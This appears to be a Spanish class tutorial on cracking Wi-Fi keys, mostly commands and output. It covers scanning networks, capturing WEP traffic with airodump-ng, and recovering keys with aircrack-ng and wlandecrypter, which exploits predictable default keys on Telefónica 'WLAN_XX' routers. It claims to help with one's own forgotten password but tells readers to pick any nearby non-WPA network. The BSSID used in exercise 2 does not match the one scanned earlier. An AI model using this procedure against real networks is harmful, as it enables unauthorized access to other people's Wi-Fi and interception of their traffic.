Como hackear redes Wifi

Conceptos y ejercicios previos

Artículos interesantes

Si has olvidado la contraseña de tu wifi, esta es la forma de averiguarla:

Ejercicio 1

  • ATENCIÓN. A partir de ahora conviene por comodidad ejecutar todos los comandos como root. Para ello:


ignacio@cherokee:~$ sudo su
[sudo] password for ignacio:

  • Este ejercicio tiene como objetivo comprobar si nuestra tarjeta Wifi funciona con el software aircrack, y realizar las tareas básicas para el hacking de Wifis: buscar wifis, capturar paquetes y encontrar contraseñas.

1Averigua el nombre de tu tarjeta WIFI utilizando el comando iwconfig. Como veis en la parte inferior, la tarjeta wifi se llama wlan0. En tu caso puede llamarse de otra manera.

root@cherokee:~$ iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.
wlan0     IEEE 802.11abgn  ESSID:""
         Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
         Tx-Power=15 dBm
         Retry min limit:7   RTS thr:off   Fragment thr=2352 B
         Power Management:off
         Link Quality:0  Signal level:0  Noise level:0
         Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
         Tx excessive retries:0  Invalid misc:0   Missed beacon:0

2 – Averigua el modelo de tu tarjeta wifi mediante los comandos lshw y lspci (solo pongo las partes interesantes):

root@cherokee:~$ lshw -C network
 *-network
      description: Wireless interface
      product: Wireless WiFi Link 5300
      vendor: Intel Corporation
      physical id: 0
      bus info: pci@0000:03:00.0
      logical name: wmaster0
      version: 00
      serial: 00:21:6a:0b:f5:28
      width: 64 bits
      clock: 33MHz
      capabilities: pm msi pciexpress bus_master cap_list logical ethernet physical wireless
      configuration: broadcast=yes driver=iwlagn latency=0 module=iwlagn multicast=yes wireless=IEEE 802.11abgn

root@cherokee:~$ lspci -v
03:00.0 Network controller: Intel Corporation Wireless WiFi Link 5300
 Subsystem: Intel Corporation Device 1011
 Flags: bus master, fast devsel, latency 0, IRQ 2297
 Memory at f4300000 (64-bit, non-prefetchable) [size=8K]
 Capabilities: [c8] Power Management version 3
 Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable+
 Capabilities: [e0] Express Endpoint, MSI 00
 Capabilities: [100] Advanced Error Reporting <?>
 Capabilities: [140] Device Serial Number 28-f5-0b-ff-ff-6a-21-00
 Kernel driver in use: iwlagn
 Kernel modules: iwlagn

3 – Busca tu tarjeta en la web de aircrack-ng Lista de tarjetas compatibles

4 – Escanea en busca de wifis. Fíjate en que no ponga “WPA”. Ese tipo de encriptación es muy difícil de hackear. Apunta el nombre y el canal.

root@cherokee:~$ iwlist wlan0 scan
wlan0     Scan completed :
         Cell 01 - Address: 00:01:38:9C:83:0A
                   ESSID:"WLAN_B8"
                   Mode:Master
                   Channel:2
                   Frequency:2.417 GHz (Channel 2)
                   Quality=43/100  Signal level:-83 dBm  Noise level=-127 dBm
                   Encryption key:on
                   IE: Unknown: 0007574C414E5F4238
                   IE: Unknown: 010882848B968C129824
                   IE: Unknown: 030102
                   IE: Unknown: 0706455320010D14
                   IE: Unknown: 2A0100
                   IE: Unknown: 3204B048606C
                   IE: Unknown: DD180050F2020101000003A4000027A4000042435E0062322F00
                   IE: Unknown: DD0A001091010300A80C0400
                   Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                             9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                             48 Mb/s; 54 Mb/s
                   Extra:tsf=000000efb4290194
                   Extra: Last beacon: 1508ms ago

5 – Instalar aircrack-ng y empieza a capturar paquetes en el canal de la wifi que hayas elegido (-c 2). Estos paquetes los guardaremos en un archivo que se llamará “prueba”. Ten en cuenta que los únicos paquetes que sirven son los que están debajo de la columna “#data”. Cuando quieras parar de capturar, pulsa Control+C.

root@cherokee:~$ aptitude install aircrack-ng
root@cherokee:~$ airodump-ng -c 2 -w prueba wlan0
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                          

00:02:CF:79:59:D9  -83   0       22        2    0   3  54 . WEP  WEP         WLAN_A3
00:01:38:9C:83:0A  -82  39       28        0    0   2  54e. WEP  WEP         WLAN_B8

6 – Para capturar paquetes es necesario que haya tráfico en la red (es decir, que un usuario esté utilizando esa Wifi). Si, gracias a tu paciencia, capturas suficientes paquetes (de 10000 a 60000, dependiendo del cifrado), utiliza aircrack-ng para averiguar la clave:

root@cherokee:~$ aircrack-ng prueba*cap

Ejercicio 2 – Hackea tu router de  telefónica (WLAN_XX)

  • En este ejercicio vamos a utilizar una técnica que permite que, capturando solo 4 paquetes, podamos averiguar nuestra contraseña de una red Wifi de Telefónica. La mayoría de los routers de telefónica tienen un nombre como “WLAN_AB” o “WLAN_B8″. De la misma forma que su nombre, las contraseñas vienen predefinidas en un rango bastante pequeño. Debido a este fallo de seguridad, entrar en nuestra red wifi de telefónica resulta relativamente sencillo.

1 – Instala wlandecrypter (explota vulnerabilidades de routers telefónica)

#//Crea una carpeta para todas estas chapucillas :D
root@cherokee:/home/ignacio# mkdir aircrack && cd aircrack
#//Descarga y descomprime el programa
root@cherokee:/home/ignacio# wget http://www.sofiytommy.com/wifi/wlandecrypter-0.6.tar.gz
root@cherokee:/home/ignacio# tar -xzvf wlandecrypter-0.6.tar.gz

root@cherokee:/home/ignacio# cd wlandecrypter

#//Compílalo e instálalo
root@cherokee:/home/ignacio# make
root@cherokee:/home/ignacio# make install

2 – Descarga y configura el script de Reciclanet para ayudar al escaneo de wifis (filtra todo lo que sale del escaneo dejando solo la información útil (encriptación, nombre, calidad, canal). Es especialmente útil cuando hay muchas wifis.

root@cherokee:/home/ignacio# wget http://www.reciclanet.org/srcd_scripts/escanearwifis.sh
root@cherokee:/home/ignacio# chmod +x escanearwifis.sh

3 – Escanea en busca de wifis

root@cherokee:/home/ignacio# ./escanearwifis.sh wlan0
 Cell 01 - Address: 00:01:38:9C:83:0A
 "WLAN_B8"
 Frequency:2.417 GHz (Channel 2)
 Quality=30/100  Signal level:-82 dBm  Noise level=-94 dBm
 Encryption key:on

5 – Escoge tu wifi para comenzar a capturar paquetes. Ten en cuenta el BSSID, un número como este: 00:60:B3:50:B5:AC root@cherokee:/home/ignacio# airodump-ng -c 2 -w prueba wlan0

6 – Una vez hayas conseguido unos cuantos paquetes (con 4 a veces es suficiente), genera el diccionario de claves. Lo vamos a llamar “diccionario_2B”

wlandecrypter 00:60:B3:50:B5:AC WLAN_B8 diccionario_B8

7 – Captura la clave!

aircrack-ng -w diccionario_B8 -b 00:60:B3:50:B5:AC prueba*cap

Sin Comentarios - Escribe!

Clase - 2005

Clase - 2005

gente de todo el mundo

gente de todo el mundo